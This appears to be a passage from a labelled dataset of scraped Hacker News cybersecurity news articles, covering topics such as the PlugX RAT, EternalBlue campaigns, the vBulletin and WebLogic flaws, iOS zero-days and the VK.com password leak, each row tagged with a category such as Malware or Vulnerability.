Facebook a week earlier and Facebook said it had traced a cyber attack back to China which had infiltrated employees' laptops. ",Cyber_Attack Plugx RAT targeting government organizations in Japan using spear phishing,https://thehackernews.com/2012/09/plugx-rat-targeting-government.html,"Roland Dela Paz (Threat Researcher) at TrendMirco reported that last year a Malware Campaign to target specific users in Japan, China, and Taiwan once again on rise using new breed of Remote Access Tool (RAT) called Plugx (also known as Korplug). This new custom made version comes for less recognition and more elusiveness from security researchers. He also mention that last year campaign used the Poison Ivy RAT, but now its Plugx take its place. ""Similar to previous Poison Ivy campaigns, it also arrives as an attachment to spear-phished emails either as an archived, bundled file or specially crafted document that exploits a vulnerability in Adobe Acrobat Reader or Microsoft Office. We've also encountered an instance of Plugx aimed at a South Korean Internet company and a U.S. engineering firm."" Roland mentioned. The attached pdf exploits CVE-2010-2883 (with Plugx (RAT) payload connects to a command and control (C&C) server named {BLOCKED}eo.flower-show.org. CVE-2010-2883: Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010) This C&C server appeared to be have been used by Poison Ivy and PlugX variants. According to Roland this rat drop a file at %System Root%\Documents and Settings\All Users\SxS\bug.log which contain it own errors and then possibly it uploads back to attacker server for Auditing. This shows that , this variant is still in beta stage. Trend Micro monitoring PlugX's development and We at THE HACKER NEWS, will update you with new info when published. ",Malware More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry,https://thehackernews.com/2017/05/eternalblue-smb-exploit.html,"Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonged to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way. The April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of Windows hacking tools, including dangerous Windows SMB exploit. After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide. I have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives. Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily. Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks. So, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals. The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials. According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, ""a backdoor may persist and compromised credentials may be used to regain access"" to the affected systems. Both campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials. Russian Campaign: Credential-Theft Attacks Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue. Once infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser. The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server. Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system. According to Secdo, ""at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."" This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian. Chinese Campaign: Installs Rootkit and DDoS Botnet This campaign was also seen in late April. Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack. But only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on 'Agony rootkit' to make persistent. Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine. ""These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch,"" Secdo concluded. ""We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."" These malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access. The recent example is of ""Adylkuzz,"" a recently-discovered stealthy cryptocurrency-mining malware that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks. These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month. Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks. You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked. ",Malware Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again,https://thehackernews.com/2018/04/oracle-weblogic-rce-exploit.html,"Earlier this month, Oracle patched a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server. However, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now found a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again. WebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically. Initially discovered in November last year by Liao Xinxi of NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001. If exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Since a proof-of-concept (PoC) exploit for the original Oracle WebLogic Server vulnerability has already been made public on Github and someone has just bypassed the patch as well, your up-to-date services are again at risk of being hacked. Although @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take a few hours or days for skilled hackers to figure out a way to achieve same. Currently, it is unclear when Oracle would release a new security update to address this issue that has re-opened CVE-2018-2628 flaw. In order to be at least one-step safer, it is still advisable to install April patch update released by Oracle, if you haven't yet because attackers have already started scanning the Internet for vulnerable WebLogic servers. ",Cyber_Attack The Hacker News Hacking Awards : Best of Year 2011,https://thehackernews.com/2012/01/hacker-news-hacking-awards-best-of-year.html,"The Hacker News Hacking Awards : Best of Year 2011 2011 has been labeled the ""Year of the Hack"" or ""Epic #Fail 2011"". Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security. Every year there are always forward advancements in the tools and programs that can be used by the hackers. At the end of year 2011 we decided to give ""The Hacker News Awards 2011"". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News. Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak's, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: ""LulzSec was here you sexy bastards! Stupid Sony, so very stupid."" The Hacker News Awards Categories & Winners 1.) Person of the Year : Julian Paul Assange He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the ""Age of WikiLeaks"". Assange described himself in a private conversation as ""the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest"". Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda's. Keep up the good work Wikileaks and we stand in support and behind you. 2.) Best Hacking Group of the Year 2011 : ANONYMOUS DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN'T GOIN AWAY! Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here. 3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER CHARLIE SHOWS TUNA ISN'T THE ONLY THING TO PROFIT FROM! Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone's or iPad's security. Charlie Miller gets a kick of out defeating Apple's security mechanisms, using his hacking skills to break into Macbooks and iPhones. 4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS! NOT!!!!! HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists! Gotta love these guys. Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous, hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund's email. 5.) Best Defacement of the Year 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!! Turkguvenligi also known by the name ""TG Hacker' hacked some very high profile sites using DNS Hijacking. Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was ""World Hackers Day"". TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008. 6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked) BEWARE OF TIGER'S IN MOTION…….COMING TO YOUR WEBSITE SOON! InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh. In our humble opinion, this is the craziest hack of the year. 7.) Malware of Year 2011 : DuQu ALAH CAN'T HELP IRAN…….NOT WITH DuQu ON THE LOOSE! This year was really hot on malware discovery and analysis. DuQu became the first known network modular rootkit. DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities. 8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit) HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT! ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins. 9.) High Profile Hacker of the Year 2011 : LULZSEC LULZSEC KEEPS US LAUGHING ALL THROUGH 2011! Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things ""for the lulz"" and focus on the possible comedic and entertainment value of attacking targets. 10.) Biggest Victim of the Year 2011 : SONY SONY SHINES AS THE BIGGEST VICTIM OF ALL! Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony's websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) . 11.) Most Spamy Social Network : FACEBOOK FACEBOOK OUTTA FACE IT……..IT'S A RIPE TARGET FOR 2012 Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds. 12.) Most Vulnerable Mobile OS of Year 2011 : ANDROIDS MALWARE GETS A FREE RIDE ON MOBILE DEVICES! Mobile devices are seeing a record number of Malware attacks, with Androids leading the way as the mobile operating systems are the most likely to be targeted. Android's vulnerability to malicious content including third-party apps, SMS Trojan viruses and unexpected bugs distributed through free Wi-Fi connections has risen by 45% in 2011. This year we have seen record-breaking numbers of Malware, especially on mobile devices, where the uptake is in direct correlation to popularity. 13.) Best Hacking Book of the Year: BACKTRACK 5 WIRELESS PENETRATION TESTING ATTENTION CLASS, VIVEK RAMACHANDRAN HAS ENTERED THE ROOM! Vivek Ramachandran is a world renowned security researcher and evangelist, who is well known for his discovery of the Wireless Caffe Latte attack, and author of the most amazing book ""BackTrack 5 Wireless Penetration Testing. This book is written completely from a practical perspective. The book wastes no time in delving into a hands-on session with wireless networking. All the way through there are lots of screengrabs, so you can see what should be happening on your screen. 14.) Most Innovative Hack : DIGITAL CERTIFICATES SPOOFING BY COMODO HACKER COMODOHACKER BRINGS OUT THE DRAGON IN CYBER SECURITY CONCERNS The name ""Comodohacker"" gets the most Innovative Hacker award from THN for the breach of the Internet's trust system arising from an outmoded method for assuring that a Web site is authentic. A breach that let a hacker spoof digital certificates for Google.com, Yahoo.com, and other Web sites is prompting browser makers to rethink security. A 21-year-old Iranian patriot took credit saying he was protesting US policy and retaliating against the US for its alleged involvement with last year's Stuxnet, which experts say was designed to target Iran's nuclear program. 15.) Biggest hack of the Year 2011 : SONY PLAYSTATION SONY, SONY, WE PLAY YOUR LEAKS ON OUR OWN STATIONS! The PlayStation Network is an online multiplayer gaming and digital media delivery service owned and run by Sony Computer Entertainment .On April 26, 2011 Sony Playstation announced its network and Qriocity had both been compromised by hackers between April 17 and April 19 allowing access to 70 million user accounts. Get full coverage on this News. ""TRUTH IS THE MOST POWERFUL WEAPON AGAINST INJUSTICE"" For additional information, please contact us at: thehackernews@gmail.com ",Malware #Enter_at_your_own_Risk Cyber Awareness Magazine Issue January edition Released,https://thehackernews.com/2012/01/enteratyourownrisk-cyber-awareness.html,"#Enter_at_your_own_Risk Cyber Awareness Magazine Issue January edition Released As we promised last month, The Hacker News along with Security-FAQs, SecManiac, Korben, Security-Shell, SecTechno have come together to bring you an outstanding array of internet security and hacking information. You can Download Here Special Magazine January 2012 Edition. Previous Editions available Here. Sit back, read and enjoy : Lee Ives from London, England talk about internet security for your children and what to watch out for and how to protect them and yourself. Security Expert, Pierluigi Paganini takes us on a visit to China and makes us wonder just how influential China's hacking is on world internet security. Read and decide for yourself. Get political emotions warmed up reading ""Anatomy of a Revolution"" by our own editorial staff. Mourad Ben Lakhoua takes us on a scary journey of what new Malwares are lurking about and what to expect in the future. Avram Marius Gabriel, who works under the pseudonym ""d3v1l"", gives us a look at an emerging technical society as like minded techies in Romania come together to share and learn. Get mad and take action as you read how your internet privacy and freedoms are about to be taken away in our editor Patti Galle's article on SOPA…….coming to your personal rights soon. Manuel Dorne, administrator from Korben gives us a look at FIREFOX security tools. A must for any techie interested in ""how to."" And finally, a good read about politics in general in ""No Turning Back"" by our editorial staff. Welcome to the January Special Edition…..let us know what you think, learn, and hope for! Connect With us on Google+ , Twitter and Facebook. ",Malware VK.com HACKED! 100 Million Clear Text Passwords Leaked Online,https://thehackernews.com/2016/06/vk-com-data-breach.html,"Another day, another Data Breach! Now, Russia's biggest social networking site VK.com is the latest in the line of historical data breaches targeting social networking websites. The same hacker who previously sold data dumps from MySpace, Tumblr, LinkedIn, and Fling.com, is now selling more than 100 Million VK.com records for just 1 Bitcoin (approx. US$580). The database contains information like full names (first names and last names), email addresses, plain-text passwords, location information, phone numbers and, in some cases, secondary email addresses. Yes, plain-text passwords. According to Peace, the passwords were already in plain text when the VK.com was hacked. So, if the site still stores passwords in cleartext today, this could be a real security risk for its users. The data breach has initially been reported by LeakedSource search engine, which received portions of the database from one of the people who bought it. The company has already analyzed the contents of the data dump and has added it to its service. So, you can use its search engine to check if you were compromised. Russia's Facebook VK.com is said to be the largest social networking site in Europe with more than 350 Million users. So, the hack is believed to be the biggest hack the site has ever experienced. The validity of the credentials exposed in the hack is thought to have been stolen in late-2012 or early 2013 when VK.com had just under 190 Million users. All the LinkedIn, MySpace, and Tumblr data breaches are also believed to have taken place during the same duration, between 2012 and 2013, when many websites were not practicing appropriate Web security policies, like hashing and salting passwords. The hacker, named Peace (or Peace_of_mind), is selling the dataset -- which is over 17 gigabytes in size -- on The Real Deal dark web marketplace for a mere 1 Bitcoin. According to LeakedSource, the most common password used by VK.com users was ""123456,"" followed by ""qwerty"" and ""123123,"" which are incredibly easy to predict. Also, the vast majority of email addresses came from mail.ru. Like other data breaches, I strongly suggest you change your password immediately, especially if you use the same password for other websites. ",Data_Breaches Office based Trojan threat for Mac OS X by Chinese hackers,https://thehackernews.com/2012/03/office-based-trojan-threat-for-mac-os-x.html,"Office based Trojan threat for Mac OS X by Chinese hackers Security company ESET watches the newly found Trojan for OS X establish connections and receive commands to steal information. Earlier this month, researchers from AlienVault and Intego reported a new malware attack targeting Tibetan NGOs (Non-Governmental Organizations). The attack consisted of luring the victim into visiting a malicious website, which then would drop a malicious payload on the target's computer using Java vulnerability CVE-2011-3544 and execute it. During installation on a Windows system, the payload deployed was a variant of Gh0st RAT (Remote Access Trojan). On the Mac though, a new payload, dubbed OSX/Lamadai.A, was used. ESET observed that once the Trojan installs it will establish a connection to a hard-coded remote C&C server located in China, and will wait in ""busy"" loop where it attempts to maintain its connection with the server. The server can then be used to issue commands to the infected system for uploading or downloading files, or execute scripts and commands the basics for allowing someone to remotely target a system, browse around on it, and steal information. The command-and-control domain involved in the attack is located in China and the attack exploits a three-year-old vulnerability which no one could be bothered to fix. ",Malware Update Your iOS Devices Now — 3 Actively Exploited 0-Days Discovered,https://thehackernews.com/2020/11/update-your-ios-devices-now-3-actively.html,"Apple on Thursday released multiple security updates to patch three zero-day vulnerabilities that were revealed as being actively exploited in the wild. Rolled out as part of its iOS, iPadOS, macOS, and watchOS updates, the flaws reside in the FontParser component and the kernel, allowing adversaries to remotely execute arbitrary code and run malicious programs with kernel-level privileges. The zero-days were discovered and reported to Apple by Google's Project Zero security team. ""Apple is aware of reports that an exploit for this issue exists in the wild,"" the iPhone maker said of the three zero-days without giving any additional details so as to allow a vast majority of users to install the updates. The list of impacted devices includes iPhone 5s and later, iPod touch 6th and 7th generation, iPad Air, iPad mini 2 and later, and Apple Watch Series 1 and later. The fixes are available in versions iOS 12.4.9 and 14.2, iPadOS 14.2, watchOS 5.3.9, 6.2.9, and 7.1, and as a supplemental update for macOS Catalina 10.15.7. According to Apple's security bulletin, the flaws are: CVE-2020-27930: A memory corruption issue in the FontParser library that allows for remote code execution when processing a maliciously crafted font. CVE-2020-27950: A memory initialization issue that allows a malicious application to execute arbitrary code with kernel privileges. CVE-2020-27932: A type-confusion issue that makes it possible for a malicious application to disclose kernel memory. ""Targeted exploitation in the wild similar to the other recently reported 0days,"" said Shane Huntley, Director of Google's Threat Analysis Group. ""Not related to any election targeting."" The disclosure is the latest in the string of zero-days Project Zero has reported since October 20. First came the Chrome zero-day in Freetype font rendering library (CVE-2020-15999), then a Windows zero-day (CVE-2020-17087), followed by two more in Chrome and its Android variant (CVE-2020-16009 and CVE-2020-16010). A patch for the Windows zero-day is expected to be released on November 10 as part of this month's Patch Tuesday. While more details are awaited on whether the zero-days were abused by the same threat actor, it's recommended that users update their devices to the latest versions to mitigate the risk associated with the flaws. ",Vulnerability iOS apps vulnerable to HTTP Request Hijacking attacks over WiFi,https://thehackernews.com/2013/10/ios-apps-vulnerable-to-http-request_29.html,"Security researchers Adi Sharabani and Yair Amit have disclosed details about a widespread vulnerability in iOS apps, that could allow hackers to force the apps to send and receive data from the hackers' own servers rather than the legitimate ones they were coded to connect to. Speaking about the issue at RSA Conference Europe 2013 in Amsterdam, researchers have provided details on this vulnerability, which stems from a commonly used approach to URL caching. Demonstration shows that insecure public networks can also provide stealth access to our iOS apps to potential attackers using HTTP request hijacking methods. The researchers put together a short video demonstrating, in which they use what is called a 301 directive to redirect the traffic flow from an app to an app maker's server to the attacker's server. There are two limitations also, that the attacker needs to be physically near the victim for the initial poisoning to perform this attack and the flaw works only against HTTP traffic. ""A victim walks into Starbucks, connects to the Wi-Fi and uses her favorite apps,"" explains an example. ""Everything looks and behaves as normal, however an attacker is sitting at a nearby table and performs a silent HRH attack on her apps. The next day, she wakes up at home and logs in to read the news, but she's now reading the attacker's news!"" They estimate that at least 10,000 iOS apps in the Apple App Store are vulnerable to the hack. As a result, apps that display news, stock quotes, social media content, or even some online banking details can be manipulated to display fraudulent information and intercept data sent by the end user. Victims can uninstall apps to scrub their devices clean, and Skycure has released app code that prevents the web caching from taking place. It may be a while until developers can get this fix implemented, so connect to those public networks with extreme caution. Swati Khandelwal - Working at 'The Hacker News'. Social Media Lover and Gadgets Girl. Speaker, Cyber Security Expert and Technical Writer.(Google+ Profile) ",Vulnerability Remotely Exploitable Flaw Puts Millions of Internet-Connected Devices at Risk,https://thehackernews.com/2017/07/gsoap-iot-device-hacking.html,"Security researchers have discovered a critical remotely exploitable vulnerability in an open-source software development library used by major manufacturers of the Internet-of-Thing devices that eventually left millions of devices vulnerable to hacking. The vulnerability (CVE-2017-9765), discovered by researchers at the IoT-focused security firm Senrio, resides in the software development library called gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML application. Dubbed ""Devil's Ivy,"" the stack buffer overflow vulnerability allows a remote attacker to crash the SOAP WebServices daemon and could be exploited to execute arbitrary code on the vulnerable devices. The Devil's Ivy vulnerability was discovered by researchers while analysing an Internet-connected security camera manufactured by Axis Communications. ""When exploited, it allows an attacker to remotely access a video feed or deny the owner access to the feed,"" researchers say. ""Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded."" Axis confirmed the vulnerability that exists in almost all of its 250 camera models (you can find the complete list of affected camera models here) and has quickly released patched firmware updates on July 6th to address the vulnerability, prompting partners and customers to upgrade as soon as possible. However, researchers believe that their exploit would work on internet-connected devices from other vendors as well, as the affected software is used by Canon, Siemens, Cisco, Hitachi, and many others. Axis immediately informed Genivia, the company that maintains gSOAP, about the vulnerability and Genivia released a patch on June 21, 2017. The company also reached out to electronics industry consortium ONVIF to ensure all of its members, including Canon, Cisco, and Siemens, those who make use of gSOAP become aware of the issue and can develop patches to fix the security hole. Internet of Things (IoT) devices has always been the weakest link and, therefore, an easy entry for hackers to get into secured networks. So it is always advisable to keep your Internet-connected devices updated and away from the public Internet. ",Vulnerability "Security firm Bit9 hacked, Stolen Digital Certs Used To Sign Malware",https://thehackernews.com/2013/02/security-firm-bit9-hacked-stolen.html,"Bit9 disclosed Friday that hackers had stolen digital code signing certificates from its network and have utilized it to sign malware. Bit9, a company that provides software and network security services to the U.S. government and at least 30 Fortune 100 firms. ""As a result, a malicious third party was able to illegally gain temporary access to one of our digital code-signing certificates that they then used to illegitimately sign malware,"" Bit9 Chief Executive Patrick Morley said in a blog post. The attackers then sent signed malware to at least three of Bit9's customers, although Bit9 isn't saying which customers were affected or to what extent. ""Since we discovered this issue, we have been working closely with all of our customers to ensure they are no longer vulnerable to malware associated with the affected certificate."" and company said it has resolved the issue. It is not the first time that hackers have breached a security firm as part of a sophisticated scheme to access data at one of their customers. EMC Corp's RSA Security division disclosed that it was breached in 2011. ",Cyber_Attack Apple iOS 7 Updates Silently Remove Encryption for Email Attachments,https://thehackernews.com/2014/05/ios-apple-iphone-data-protection-email-attachment.html,"There is no question that Mobile devices have become a staple in everyday living around the world. But have you ever asked yourself, How Secure are the Android, iPhone or any other Smart devices? It is really important for us to think about the Security and Privacy of our Data stored in Smartphones. In June 2010, Apple introduced 'Data protection' feature in iOS 4.0 devices that offer hardware encryption for all the data stored on the devices. ""Data protection enhances the built-in hardware encryption by protecting the hardware encryption keys with your passcode. This provides an additional layer of protection for your email messages attachments, and third-party applications."" Apple claimed in an old announcement. But unexpectedly, In last few updates Apple has silently removed the email attachment encryption from data protection mechanisms. Noticed by Security Researcher - Andreas Kurtz, claims that since at least version 7.0.4 and including the current version 7.1.1, does not encrypt email attachments anymore. ""I verified this issue by restoring an iPhone 4 (GSM) device to the most recent iOS versions (7.1 and 7.1.1) and setting up an IMAP email account1, which provided me with some test emails and attachments. Afterwards, I shut down the device and accessed the file system using well-known techniques (DFU mode, custom ramdisk, SSH over usbmux). Finally, I mounted the iOS data partition and navigated to the actual email folder. Within this folder, I found all attachments accessible without any encryption/restriction"" he explained in a blog post. That means, email attachments are not encrypted on the iOS devices by a unique 256-bit crypto engine, and if someone else gets access to your device, he will be able to get access to your private content. He also tested the encryption mechanism with iOS forensics tool called 'iPhone Data Protection' for POP or ActiveSync email accounts, and verified that iOS latest versions are not able to encrypt email attachments. At this point, even we can't answer that why Apple removed the encryption for Email attachments, but this disclosure is definitely right now hitting my mind with more controversial questions about relationship with Apple and NSA. Andreas Kurtz has already reported the issue to Apple Security team and they replied that Apple were aware of it. But I guess Apple has no plan to patch the issue in upcoming iOS updates, as they have not indicated anything related in email conversion with Kurtz. ",Vulnerability Hackers Are Targeting Facebook via spreading malware !,https://thehackernews.com/2011/02/hackers-are-targeting-facebook-via.html,"Facebook accounts are becoming favorite targets of hackers. If your account has been hacked, you could be in good company considering Facebook founder Mark Zuckerberg and French President Sarkozy have also been victims. Actually, thousands -- maybe millions -- of Facebook pages have been hacked. The hackers then use the accounts to send out erroneous messages to ""friends."" One of your friends seems to have sent you a video or awesome photo or link, and suggests you click on it. The computer screen tells you to log in again to see the video or photo or quiz. But as soon as you sign in, you are giving your information to a hacking site, which now has your screen name and password.You probably would be suspicious of a strange e-mail in your inbox, but when you believe you are getting a link from a friend on a social network, you might not be so cautious. You have actually been caught by one of the most common forms of hacking called ""phishing."" Recently estimated 1.5 million Facebook accounts are listed for sale on a website discovered by Verisign's iDefense Labs. The names were sold for as much as $45 for accounts with more than 10 friends. They are considered a way of spreading malware rather than strictly for identity theft. People who find out that their Facebook accounts have been hacked, should immediately reset their passwords. They should also send Facebook a message, which will allow the company to look into the situation further. ",Malware vBulletin Releases Patch Update for New RCE and SQLi Vulnerabilities,https://thehackernews.com/2019/10/vBulletin-hacking-exploit.html,"After releasing a patch for a critical zero-day remote code execution vulnerability late last month, vBulletin has recently published a new security patch update that addresses 3 more high-severity vulnerabilities in its forum software. If left unpatched, the reported security vulnerabilities, which affect vBulletin 5.5.4 and prior versions, could eventually allow remote attackers to take complete control over targeted web servers and steal sensitive user information. Written in PHP, vBulletin is a widely used proprietary Internet forum software package that powers over 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. Discovered by application security researcher Egidio Romano, the first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw, while the other two are SQL injection issues, both assigned a single ID as CVE-2019-17271. vBulletin RCE and SQLi Flaws The RCE flaw resides in the way vBulletin forum handles user requests to update avatars for their profiles, an icon or graphical representation of the user, allowing a remote attacker to inject and execute arbitrary PHP code on the target server through unsanitized parameters. However, it should be noted that this vulnerability is not exploitable in the default installation of the vBulletin forum, rather exploitation is possible when ""Save Avatars as Files"" option is enabled by the website administrator. Romano has also released a public proof-of-concept exploit for this RCE vulnerability. The other two vulnerabilities are read in-band and time-based SQL injection issues that reside in two separate endpoints and could allow administrators with restricted privileges to read sensitive data from the database, which they otherwise may not be allowed to access. Since these two SQL injection flaws can not be exploited by any registered user and require special permissions, vBulletin forum administrators and users need not to panic. Security Patches Released Romano responsibly reported all the vulnerabilities to the vBulletin project maintainers just last week on September 30, and the team acknowledged his findings and released the following security patch updates that address the reported flaws. vBulletin 5.5.4 Patch Level 2 vBulletin 5.5.3 Patch Level 2 vBulletin 5.5.2 Patch Level 2 Administrators are highly recommended to apply the security patch before hackers started exploiting the vulnerabilities to target their forum users—just like someone did last week to steal login information of nearly 245,000 Comodo Forums users after the company failed to apply available patches on time. ",Vulnerability Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers,https://thehackernews.com/2016/08/bitcoin-software-hack.html,"Another day, another bad news for Bitcoin users. A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most 